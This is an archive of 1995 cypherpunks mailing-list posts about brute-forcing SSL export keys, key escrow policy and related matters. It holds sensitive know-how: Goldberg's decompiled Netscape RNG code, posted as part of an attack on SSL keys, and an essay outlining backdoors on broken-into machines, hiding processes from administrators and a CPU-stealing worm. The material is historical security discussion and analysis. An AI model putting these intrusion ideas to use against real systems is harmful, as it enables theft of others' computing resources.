>the NAKed segment.  Perhaps this does give an idea of a server strategy
>to do *just* that, though.

I mean a setup where if the key server is shut down by a D.O.S. attack,
or congestion, or whatever, that the users, if they so desire, can shift
into random mode and end their dependance on the server. I don't see
a need for all of us to be doing random searches right now just because
someone _might_ launch a D.O.S. attack. Another benefit of random mode
being implemented, but secondary, is that all of the people who previously
had to manually get keyspace by WWW and report it back by hand - they
can just put it in random mode and fire-and-forget, just like everyone
with brloop does. 

Don

PS: Piete: What's the current status of the server? I've got by brloop
working apparently, and I calculate I'm able to search 800 segments a day,
and I'm anxious to see if it works. It's stopped giving me only sleep
orders, and now appears to give me a keyspace, but it reports a checksum
error and sleeps for a few minutes. 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEQKzsLa+QKZS485AQEjjgL/X2jQ0J0k+0gc4GUOzNQrKKtRHvqy4dlq
FmxaGDsdnBI+eO8DSu8C6jmRdw+VpcRiFQGDiTMklSmKNEwEqwq0QIvL0Dh4mz7k
vTsYXbUdlGwf9KUJv5PtwNojP+nQl9Pe
=tTkz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iagoldbe@csclub.uwaterloo.ca>
Date: Tue, 29 Aug 95 22:13:04 PDT
To: cypherpunks@toad.com
Subject: Netscape's RNG
Message-ID: <199508300512.BAA23185@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


Someone on the list (sorry, I forget who), suggested that Netscape's RNG
be looked at to see if the secret part of the SSL RC4/40 master key could
be determined more directly.

I used gdb on the Solaris version.  SSL_GenerateRandomBytes() is called
when random bytes are needed.  It initializes the RNG, if necessary, and then
calls RNG_GenerateRandomBytes.

When I run "netscape https://banking.wellsfargo.com/",
SSL_GenerateRandomBytes() is called 3 times; the first time, 32 bytes
are produced (I don't know what they're for); the second time, 16 bytes
are produced (the Challenge data); the third time, 64 bytes are produced,
the first 16 of which are the master key (the first 11 of which are sent
in the clear, and the next 5 are our goal).

Here's my own hand-reverse-assembly of RNG_GenerateRandomBytes:
(Correctness not actually guaranteed in any way...)

-----8<-----8<-----
struct RNG
{
    unsigned char md5bytes[0x10];
    unsigned char randbytes[0x10];
    int size;
    void *md5data;
};

RNG_GenerateRandomBytes(struct RNG *i0, char *i1, int i2)
{
    char buf[0x20];
    int o1,o2;

    while (i2 > i0->size)
    {
	memcpy(i1, &(i0->randbytes)+0x10-i0->size, i0->size);
	i1 += i0->size;
	i2 -= io->size;
	if (err = MD5_Begin(i0->md5data)) return err;
	if (err = MD5_Update(i0->md5data, &(i0->md5bytes), 0x10)) return err;
	if (err = MD5_End(i0->md5data, &(i0->randbytes), buf, 0x10)) return err;
	i0->size = 0x10;
	o2 = 0;
	o1 = &(i0->md5bytes[0x0f]);
	do
	{
	    if ((*o1)++) break;
	    --o1;
	} while (++o2 <= 0x0f);
    }

    /* i2 <= i0->size */
    memcpy(i1, &(i0->randbytes)+0x10-i0->size, i2);
    i0->size -= i2;
    return 0;
}
-----8<-----8<-----

It looks like that Compilers course came in handy...

So it's not linear congruential.  I guess the next step is to figure out
how it's seeded, but that not for me to do (at least not tonight...).

Here's another question about a more direct method:
The 5 secret bytes are encrypted with the server's public (RSA?) key.
Does the server use the same public key every time?  How do you read
the public key, given the Certificate Data (what's the format of the
certificate)?  Is it feasible to try to attack the public key with a
massively parallel (Internet) factoring program (a la RSA-129)?
Assuming that the modulus is _big_, it still is worthy to note that,
unlike cracking individual challenges, cracking the public key will
compromise _all_ communications with that server (until they catch on
and pay $$$ for another key (I think?)).

Just some thoughts,

   - Ian "it's only 10pm _here_, but it's 2am in Nova Scotia!"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tibbs@sina.hpc.uh.edu (Jason L Tibbitts III)
Date: Wed, 30 Aug 95 00:21:04 PDT
To: cypherpunks@toad.com>
Subject: Mondex and currency exchange (Was: An article for Wired magazine)
In-Reply-To: <950814205254_74774.3663_EHL102-1@CompuServe.COM>
Message-ID: <9508300711.AA14904@hpc.uh.edu>
MIME-Version: 1.0
Content-Type: text/plain


Pardon me for being behind; I'm catching up with 1500 cypherpunks
articles...  I was skimming and came upon the following:

>>>>> "JM" == Jon Matonis <74774.3663@compuserve.com> writes:

JM> Mondex in the UK currently has official government units of account
JM> digitally represented for their Mondex card trial in Swindon.  They
JM> have also announced that in the future this card will hold up to five
JM> "official" currencies.

I'm not sure how Mondex works, but if currency conversion is made easy
doesn't this have an interesting effect on the currency markets?  If I can
have my machine follow micro changes in the markets and convert my money
around instantaneously without going through a middle-man then things could
get interesting.  Then again, I'm really nieve when it comes to currency
exchange.

Please show me the flaw here.
---
  Jason L. Tibbitts III - tibbs@uh.edu - 713/743-8687 - 221SR1
System Manager:  Texas Center for Advanced Molecular Computation 
            1994 PC800 "Kuroneko"      DoD# 1723




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 30 Aug 95 00:51:44 PDT
To: cypherpunks@toad.com
Subject: Re: The illegal markets of cyberspace
Message-ID: <199508300751.AAA03910@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for the easy to understand concepts.

Now where was that nobody@nobody.org key again?

Love Always,

Carol Anne....wondering if the Undernet was as good as the Blacknet?
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Wed, 30 Aug 95 01:13:33 PDT
To: cypherpunks@toad.com
Subject: SSL Suggestions
Message-ID: <v01510101ac69da47ea63@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Many people have suggested improvements to the techinical side of brutessl.
I don't think anyone has looked at the user interface side of things. A
simple configure script, and a few more reasonable defaults would bring
quite a few more volunteers. I know of at least a handful of people who did
not contribute because they were overwhelmed by the unfriendly scripts.

While a rough user interface could serve as a basic intelligence test, I
don't think that this sort of exclusion is necessary, given the nature of
the task.

DJK

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMEQrvHIf3YegbdiBAQE1pAJYnoXhffJeTrfiEm8R1fDGMuuZCpATw9gL
M+A+LawHiPFeoHtcHp3ZBkhzOqEFS6MfMJ1wjbt9e3ILSJkVGC71OrkpiNcDBMKY
0G9G
=3NIJ
-----END PGP SIGNATURE-----

Dietrich J. Kappe | Red Planet    http://www.redweb.com/
Red Planet, L.L.C.|         "Chess Space"              /chess
1-800-RED 0 WEB   |      "MS Access Products"          /cobre
Web Publishing    |        PGP Public Key              /goedel/key.txt







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@flame.alias.net (Remailer@flame.alias.net)
Date: Wed, 20 Sep 95 16:26:53 PDT
To: cypherpunks@toad.com
Subject: NIST KEY ESCROW MEETING
Message-ID: <9509201546255317@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 07:51:07 +0200
To: cypherpunks@toad.com
From: Flame Remailer <remailer@flame.alias.net>
Subject: NIST Key Escrow meeting

Subject: NIST Key Escrow Meeting Discussion Papers

Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #1


                      Issues -- Export of
                 Software Key Escrowed Encryption


On August 17, 1995, the Administration announced its proposal to
permit the ready export of software encryption provided that the
products use algorithms with key space that does not exceed 64
bits and the key(s) required to decrypt messages/files are
escrowed with approved escrow agents.  Under the proposal,
products will be reviewed to verify that they satisfy the
criteria and, if so, they will be transferred to the Commodity
Control List administered by the Department of Commerce where the
products can be exported under a general license (in much the
same way that 40-bit RC2/RC4 encryption is licensed today).

We are working toward creating broadly stated criteria that are
in the nature of performance specifications.  To meet these
criteria, encryption products will need to implement key escrow
mechanisms that cannot be readily altered or bypassed so as to
defeat the purposes of key escrowing.

The criteria, when finalized and published, will state the
objectives, but not the exact technical method(s), by which those
objectives are satisfied.  This is to provide software publishers
the flexibility to design methods for meeting our stated
objectives in a manner that is compatible with the design of
their products.  There are, therefore, a number of questions we
must work together to answer in order to draft effective
criteria.  These questions are:

*    Avoiding multiple encryption -- How can the product be
     designed so as to prevent doubling (or tripling, etc.) the
     key space of the algorithm?

*    Disabling the key escrow mechanism -- How can products be
     made resistant to alteration that would disable or
     circumvent the key escrow mechanism?  How can the "static
     patch" problem be avoided?  How can this be tested?

*    Access to escrow information -- What mechanisms must be
     designed into encryption products to allow authorized access
     to escrowed keys?  This likely includes the identity of the
     key escrow agent(s) and a serial number for the key escrow
     agent to use to identify the key(s)/component(s) necessary
     to decrypt the message.  What other information will be
     necessary to be provided to the escrow agent to identify the
     necessary key(s)/component(s)?  Are there other comparable
     viable approaches?

*    Non-escrowed use -- How can products be made so that they do
     not function with non-escrowed products (or tampered
     escrowed products)?  How can this be tested?

*    Limiting surveillance -- How can products be designed so
     that information both sent and received by the user can be
     decrypted without release of keys of other users?

*    Practical Key Access -- How can mechanisms be designed so
     that repeated involvement of escrow agents is not required
     for decryption for multiple files/messages during the
     specified access period?

*    Assurance that keys are escrowed -- How can it be assured
     that key escrow products are indeed satisfactorily escrowed?
     For example, products could be required to be escrowed at
     time of manufacture or be made inoperable until properly
     escrowed.

*    Ability to re-escrow keys -- How can products be designed so
     that new keys can be escrowed at the user's discretion with
     a U.S. Government approved escrow agent?

*    Certified escrow agents -- Can products be designed so that
     only escrow agents certified by the U.S. government
     (domestic, or under suitable arrangements, foreign) are
     utilized?  What should be the criteria for an acceptable
     U.S. escrow agent?

                         --------------

With your input, we are hopeful that this effort will lead to
definitive criteria, which will facilitate the development of
exportable products and help minimize the time required to obtain
export licenses.  The Administration seeks to finalize such
criteria and make formal conforming modifications to the export
regulations before the end of 1995.


Note:  These issues will be discussed at the Key Escrow Issues
Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
the National Institute of Standards and Technology (Gaithersburg,
Maryland).  The meeting will be open to the public, although
seating is limited.  Advance registration is requested, please
contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
mail: carlton@micf.nist.gov.


8/25/94

                  -----------------------------
Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #2


                      Discussion Issues:
         Desirable Characteristics for Key Escrow Agents


In the government's recent announcement of its intent to allow
the export of 64-bit software key escrow encryption products, one
stipulation was that the keys would be escrowed with an approved
key escrow agent.(*1)  Exactly what qualifications/considerations
are appropriate for approval as a key escrow agent have not been
defined.  Some of the issues which need to be discussed and
resolved include the following:

*    What kinds of organizations should be excluded from
     consideration as approved key escrow agents?

*    What sort of legal agreement between the government and the
     key escrow agent is necessary to stipulate the
     responsibilities of the agent?  Should this include the
     terms and conditions under which release of a key is
     required?

*    How will liability for unauthorized release of key be
     handled?

*    Should, for example, intentionally misreleasing or
     destroying a key be criminalized?  Should this include other
     actions?

*    How can the government's needs for confidentiality of key
     release be handled?

*    Should approval of key escrow agents be tied to a public key
     infrastructure (for digital signatures and other purposes)?

*    What procedures need to be developed for the storage and
     safeguarding of keys?

*    What are the acceptable performance criteria (e.g., around-
     the-clock availability, accessibility, reliability, etc.)
     for approved key escrow agents?

*    Under what circumstances will key escrow agents in foreign
     countries be approved?

*    What process will be used to approve escrow agents?
     Costs/who pays?
---------
(*1)  "Approved," for the purposes of this discussion, means that
the government (or its agent) has formally granted permission for
an organization to hold keys for exportable encryption products.


Note:  These issues will be discussed at the Key Escrow Issues Meeting
to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National
Institute of Standards and Technology (Gaithersburg, Maryland).  The
meeting will be open to the public, although seating is limited.
Advance registration is requested, please contact Arlene Carlton on
301/975-3240, fax: 301/948-1784 or e-mail:  carlton@micf.nist.gov.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cwe@csli.stanford.edu (Cwe@csli.stanford.edu)
Date: Wed, 20 Sep 95 16:29:25 PDT
To: cypherpunks@toad.com
Subject: SSL and MIPS...
Message-ID: <9509201546275319@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 29 Aug 1995 23:03:59 -0700
From: Christian Wettergren <cwe@Csli.Stanford.EDU>


Hi!

How much computing power did we actually
use, in terms of MIPS/FLOPS*hours?

An unloaded SS10 that didn't swap went at
approximately 16400 keys/s. How many
MIPS is an SS10 approximately?

How does different algoritms compare?
DES, RC40, RSA512 etc?

Or if I pose the question differently,
what can you do with 30 GIPS for a day?

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 30 Aug 95 03:56:52 PDT
To: cypherpunks@toad.com
Subject: Re: SSL search attacks
Message-ID: <199508301056.GAA26657@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Scott Brickner <sjb@austin.ibm.com> writes:
>don@cs.byu.edu writes
>>A random (instead
>>of sequential) allocation _by the keyserver_ (out of unallocated 
>>piecemeal segments) would also take some work to implement. 
>
>The problem is that it's irrelevant to the problem.  Random allocation
>at the server is equivalent to simply "shuffling" the segments before
>assignment, which doesn't affect the rate at which the space is searched.

The point is that if J. Random Badguy knows that the key lies in segment
0x1bad and wants to get this segment and send a false NAK for it, he can
watch as key segments are doled out (perhaps with clients running on a
number of machines) and when 0x1bad gets close, say, when 0x1b0b comes
out, he can instruct all his clients to start hammering the server for
all they're worth in an attempt to get the key segment assigned to one
of his clients.

If the segments are shuffled before they are handed out then this attack
becomes impossible, since the attacker has no way of knowing when
segment 0x1bad will be handed out.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMERDPxEcrOJethBVAQG60gP9HsuCd+jID0nyESfXDCNtSwwRuRZ39rkg
SIEpltxzwMfHMQ/RD8CD5UmAHIm1EdvsztjbB5M5KnqjPKCMfw42leKhhcBBxUma
FCKN3vm4MBs+5vgM8SDeHLbn84rYxn5xijbktRdi+G/MzfAJdjmo5nUPQiWWhLn/
JyWa9rpNHxQ=
=9tcN
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Carolann@censored.org)
Date: Wed, 20 Sep 95 16:26:55 PDT
To: cypherpunks@toad.com
Subject: RE: THE ILLEGAL MARKETS OF CYBERSPACE
Message-ID: <9509201546275326@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 02:48:43 -0500
To: cypherpunks@toad.com
From: carolann@censored.org (Censored Girls Anonymous)
Subject: Re: The illegal markets of cyberspace

Thank you for the easy to understand concepts.

Now where was that nobody@nobody.org key again?

Love Always,

Carol Anne....wondering if the Undernet was as good as the Blacknet?
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Tue, 29 Aug 95 22:51:38 PDT
To: cypherpunks@toad.com
Subject: NIST Key Escrow meeting
Message-ID: <199508300551.HAA17047@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Subject: NIST Key Escrow Meeting Discussion Papers

Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #1


                      Issues -- Export of
                 Software Key Escrowed Encryption


On August 17, 1995, the Administration announced its proposal to
permit the ready export of software encryption provided that the
products use algorithms with key space that does not exceed 64
bits and the key(s) required to decrypt messages/files are
escrowed with approved escrow agents.  Under the proposal,
products will be reviewed to verify that they satisfy the
criteria and, if so, they will be transferred to the Commodity
Control List administered by the Department of Commerce where the
products can be exported under a general license (in much the
same way that 40-bit RC2/RC4 encryption is licensed today).

We are working toward creating broadly stated criteria that are
in the nature of performance specifications.  To meet these
criteria, encryption products will need to implement key escrow
mechanisms that cannot be readily altered or bypassed so as to
defeat the purposes of key escrowing.

The criteria, when finalized and published, will state the
objectives, but not the exact technical method(s), by which those
objectives are satisfied.  This is to provide software publishers
the flexibility to design methods for meeting our stated
objectives in a manner that is compatible with the design of
their products.  There are, therefore, a number of questions we
must work together to answer in order to draft effective
criteria.  These questions are:

*    Avoiding multiple encryption -- How can the product be
     designed so as to prevent doubling (or tripling, etc.) the
     key space of the algorithm?

*    Disabling the key escrow mechanism -- How can products be
     made resistant to alteration that would disable or
     circumvent the key escrow mechanism?  How can the "static
     patch" problem be avoided?  How can this be tested?

*    Access to escrow information -- What mechanisms must be
     designed into encryption products to allow authorized access
     to escrowed keys?  This likely includes the identity of the
     key escrow agent(s) and a serial number for the key escrow
     agent to use to identify the key(s)/component(s) necessary
     to decrypt the message.  What other information will be
     necessary to be provided to the escrow agent to identify the
     necessary key(s)/component(s)?  Are there other comparable
     viable approaches?

*    Non-escrowed use -- How can products be made so that they do
     not function with non-escrowed products (or tampered
     escrowed products)?  How can this be tested?

*    Limiting surveillance -- How can products be designed so
     that information both sent and received by the user can be
     decrypted without release of keys of other users?

*    Practical Key Access -- How can mechanisms be designed so
     that repeated involvement of escrow agents is not required
     for decryption for multiple files/messages during the
     specified access period?

*    Assurance that keys are escrowed -- How can it be assured
     that key escrow products are indeed satisfactorily escrowed?
     For example, products could be required to be escrowed at
     time of manufacture or be made inoperable until properly
     escrowed.

*    Ability to re-escrow keys -- How can products be designed so
     that new keys can be escrowed at the user's discretion with
     a U.S. Government approved escrow agent?

*    Certified escrow agents -- Can products be designed so that
     only escrow agents certified by the U.S. government
     (domestic, or under suitable arrangements, foreign) are
     utilized?  What should be the criteria for an acceptable
     U.S. escrow agent?

                         --------------

With your input, we are hopeful that this effort will lead to
definitive criteria, which will facilitate the development of
exportable products and help minimize the time required to obtain
export licenses.  The Administration seeks to finalize such
criteria and make formal conforming modifications to the export
regulations before the end of 1995.


Note:  These issues will be discussed at the Key Escrow Issues
Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
the National Institute of Standards and Technology (Gaithersburg,
Maryland).  The meeting will be open to the public, although
seating is limited.  Advance registration is requested, please
contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
mail: carlton@micf.nist.gov.


8/25/94

                  -----------------------------
Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #2


                      Discussion Issues:
         Desirable Characteristics for Key Escrow Agents


In the government's recent announcement of its intent to allow
the export of 64-bit software key escrow encryption products, one
stipulation was that the keys would be escrowed with an approved
key escrow agent.(*1)  Exactly what qualifications/considerations
are appropriate for approval as a key escrow agent have not been
defined.  Some of the issues which need to be discussed and
resolved include the following:

*    What kinds of organizations should be excluded from
     consideration as approved key escrow agents?

*    What sort of legal agreement between the government and the
     key escrow agent is necessary to stipulate the
     responsibilities of the agent?  Should this include the
     terms and conditions under which release of a key is
     required?

*    How will liability for unauthorized release of key be
     handled?

*    Should, for example, intentionally misreleasing or
     destroying a key be criminalized?  Should this include other
     actions?

*    How can the government's needs for confidentiality of key
     release be handled?

*    Should approval of key escrow agents be tied to a public key
     infrastructure (for digital signatures and other purposes)?

*    What procedures need to be developed for the storage and
     safeguarding of keys?

*    What are the acceptable performance criteria (e.g., around-
     the-clock availability, accessibility, reliability, etc.)
     for approved key escrow agents?

*    Under what circumstances will key escrow agents in foreign
     countries be approved?

*    What process will be used to approve escrow agents?
     Costs/who pays?
---------
(*1)  "Approved," for the purposes of this discussion, means that
the government (or its agent) has formally granted permission for
an organization to hold keys for exportable encryption products.


Note:  These issues will be discussed at the Key Escrow Issues Meeting
to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National
Institute of Standards and Technology (Gaithersburg, Maryland).  The
meeting will be open to the public, although seating is limited.
Advance registration is requested, please contact Arlene Carlton on
301/975-3240, fax: 301/948-1784 or e-mail:  carlton@micf.nist.gov.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Tue, 29 Aug 95 22:54:33 PDT
To: cypherpunks@toad.com
Subject: The illegal markets of cyberspace
Message-ID: <199508300554.HAA01155@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



I guess I'll get a bunch of cypherpunkers on me now,
even though I have the disclaimers/clarifications there.
I am not opposed to anonymous services at all, ok?

The inital idea behind this note, my main conclusion,
is that NSA and others wont be able to estimate the amount
of free computing power available "out there". The note
outlines what I consider a probable scenario that will
invalidate their estimates with a few orders of magnitude.
If that is not enough, one can always bring out the big 
jack hammer: An combiner Internet Worm/SSL Bruter kidnaping
the net for a number of hours.

/Christian

----

To: Risks Digest

This is a short note I wrote the other day. It points out
a potential future risk, and also show existing problems
with the FSP "proto-market". 

Also note that I am not opposed to anonymous services per se,
I am only pointing out possible misuses of the technology. 
There are just as big risks in not deploying encryption and
anonymous services, in going forward with a world without 
privacy and private spaces.

/Christian


THE ILLEGAL MARKETS OF CYBERSPACE
by Christian Wettergren, cwe@it.kth.se

Given the recent Brute-SSL efforts, together with the BlackNets
and an eventual ecash exchange, there is a quite interesting 
situation emerging. The future markets of Cyberspace will
be trading computing power, storage capacity and communications 
bandwidth, in addition to the more usually mentioned goods. This
market for computing capabilities can be used for legitimate purposes
as well as for illegal ones. I will here concentrate on the illegal
uses, since they will prove to be a challenge to control.

Computing power can yield pay-off in actual money, as the bruteSSL
effort has quite convincingly shown. This can create a market for 
hiring computing power for illegal purposes. The actors on such a
market can be quite safe, given the anonymity of the BlackNet and the
tracelessness of ecash (DigiCash). There are other goods on the
market as well; storage capacity and communication bandwidth.

How would such a market be operated?

The supply of "goods" for the market could be created by  hackers
breaking in to other's systems and hiring out the stolen capacity.

The intruder could install a backdoor into a foreign system that would
accept issued cryptographic access codes that would expire after a
certain amount of time or usage. This makes it possible for the
intruder to operate the business without having to go near the "scene
of the crime". There is of course a certain risk that the intruder
might lose the system to the hiring party, but that isn't such a big
deal, since first of all its not his system, and second of all he may
have booby-trapped the system for this case.

The intruder would break into computers en masse, and install the
backdoors as indicated above. They would then offer the stolen
merchandise onto a BlackNet-like arrangement. Potential buyers would
express their interests, and the broker of the BlackNet would connect
the two together.

The buyer and seller would agree on a price. The buyer would deposit
the access codes, the seller the anonymous ecash by the broker, and
the broker would effect the deal, taking a share of the profit. The
buyer can then exchange his ecash for real money, or do whatever he
wants with it. The seller brutes away onto whatever he wants, why not
the SWIFT international banking system?

The usage of stolen CPU cycles must of course be done in a careful
way. The intruder would probably install some safeguards against
excessive use, in his own interest. These safeguards could feature; *
only using spare cycles, * monitoring superuser and sysadm activities,
* hiding the process from system utilities like ps, * backing off
during daytime hours etc. 

Other merchandise

Storage capacity can be traded in a similar way, by setting up
backdoor file server processes that listenes for the proper access
codes. This kind of capacity could be used as anonymous post boxes,
where you store secrets that you don't want to store at home, even if
they are encrypted. It could also be used for bulk storage if it is
cheaper than buying a new harddrive. Since this storage isn't offered
by the proper owner, he can easily be very competetive. :-)

There are of course a number of catches trading with stolen disk
capacity, but they can quite easily be circumvented. To counter the
privacy issue, all stored files will be encrypted by the submitter.
This also eliminates potential evidence, if the proper owner discovers
the illegal use of his resources. 

There is also a certain risk of losing the files if the area is
discovered. This can be countered by storing the files in several
locations. 

There is a third risk of traffic analysis of the file server. This
analysis can be complicated by having a system of file servers that
exchange files with each other, moving them around. In this scheme a
buyer can submit a file in one location, and it can be stored in a
totally different location. It will take a concerted action by several
system owners to track down all their unwanted guests, so it is more
likely they will only shut down the file server on their own system. 

Underground bases

Trading communication bandwidth is somewhat more involved than the two
previous ones, and cannot be traded without a portion of disk and cycles. 
It can however be worth a great deal to a potential buyer. 

Buyers of communication bandwidth is most likely setting up a service
that is sold for profit. This service can probably not tolerate
day-light and accountability, and hence needs to be anonymous. A good
example of such a service is the emerging FSP-server black market,
which has been souring during the last year and a half. (There have
been lists circulating with several hundreds of FSP servers.)

An FSP server is an anonymous file server where the users can freely
upload and download files. These "black markets" of file exchanges has
been used to trade porn, pirated music and pirated software. A site in
Sweden recently caught students that had started such a server. 3
Gb/day went out through the server, and an estimated worth of $2
million in pirated PC programs were exchanged over it during it's
three weeks of operation. 

The high volumes in the server was mainly due to the large amounts of
available bandwidth out from the site. The example is not entirely
good, since there is no money or ecash exchange in this case. The
thing traded currently in the FSP buisness is instead the mere
existance of a server, trading one piece of server access info for
another. This is mainly because of lack of features in the FSP code,
and not a fundamental feature of any such market.

Communication bandwidth/service space rental is traded in a similar
way as the other merchandise over the BlackNet system, with ecash
exchange. The service provider will probably keep on using the site
until the proper owner discovers it, since it is a hassle to move the
service while running.

What is the size of this potential market?

I consider the estimates below conservative. Any illegal  market would
probably be much bigger, and constantly try to expand. 

Internet now has well over 3 million reachable computers. Lets assume 1
percent of them could be broken into at any one time, i.e 30.000
computers.

Each computer is probably good for 5-10 MIPS, but assume we can use on
average 1 MIPS without risk for discoverage. (We can probably use more
during non-office hours, but maybe nothing during the day.) You can
certainly use 10 Mb of ddisk storage on each computer without
problems. 

This adds up to a constant 30 GIPS in computing power, and 300 Gb's of
storage. And I believe this is a very conservative estimate, as I
said.

Conclusions

I think it is quite likely that markets similar to those described
above will emerge in a few years. There is already one primitive
example of such a market in the FSP buisness, and we will most likely
see more elaborate forms soon. The developement will accelerate once
there is targets which will yield interesting pay-offs.

Another conclusion is that all current estimates on available privately
available CPU power for bruteforcing is likely to be _wrong_ in the
face of such markets. The net has now shown several cases of doing the
supposedly impossible; RSA-129, SSL1, SSL2, RC40 etc.

The SSL2 effort, although impressive, I believe has only revealed a
miniscule piece of what is possible to do. Observe that the current
effort has all used volounteers, has not used any of the easily
accessible super computers on the net, nor has used any intrusion
techniques to round up CPU. 

The ultimate technique would be to have a well-writen worm raid the
Net for CPU power, maybe only being active for a few hours. The worm
could penetrate a substantial fraction of the Internet, if fed the
right database of possible attacks on different vendors.

The last, and most obvious conclusion perhaps, is that all sites
should be concerned about their security. There is more to steal in
your system than your supposedly worthless information, and I would
say that the laws are quite unclear on the issue of liability in any
of the above situations. At least if you haven't taken proper
precautions.

By the way, the above mechanisms can be used to create perfectly legit
and proper markets as well. Don't confuse the phenomenas with the
techniques. 

[BlackNet is a creation of Tim May <tcmay@got.net>, and possibly
other cypherpunkers. A black market broker announces a public key widely
on Internet, stating the market's existance. Potential buyers and sellers
encrypt their requests and offers with the public key and posts the 
encrypted info in a newsgroup somewhere. The broker can then match up 
buyers and sellers. Ecash can be used to transfer funds, and the broker
will get his share of the deal. This scheme is close to impossible to 
traffic analyse.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 30 Aug 95 08:26:43 PDT
To: starrd@iia2.org
Subject: Re: Sendmail Bugs
Message-ID: <9508301523.AA22241@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> > There is a document on alt.security which describes exploitable sendmail
> > bugs. The reference is <809544856snz@hacknet.demon.co.uk>
> > I saved a copy in case anyone would like one.
> 
> Would you please email me a copy of that doc-file?
> 
> I would find it very interesting... :-^)
> 

8lgm has released a lot more of their exploit information to the public
as well including a lot of sendmail stuff...I wouldn't be surprised if
that was the source of this.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Wed, 30 Aug 95 08:11:50 PDT
To: cypherpunks@toad.com
Subject: Non-US SSL128 site
Message-ID: <199508301510.JAA11086@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Saw this on usenet. Figured someone might want to give it a spin...

From: John Hemming - Chief Executive MarketNet <johnhemming@mkn.co.uk>
Newsgroups: sci.crypt
Subject: Announce>128 bit RC4 SSL available outside US
Date: 30 Aug 1995 10:16:39 GMT
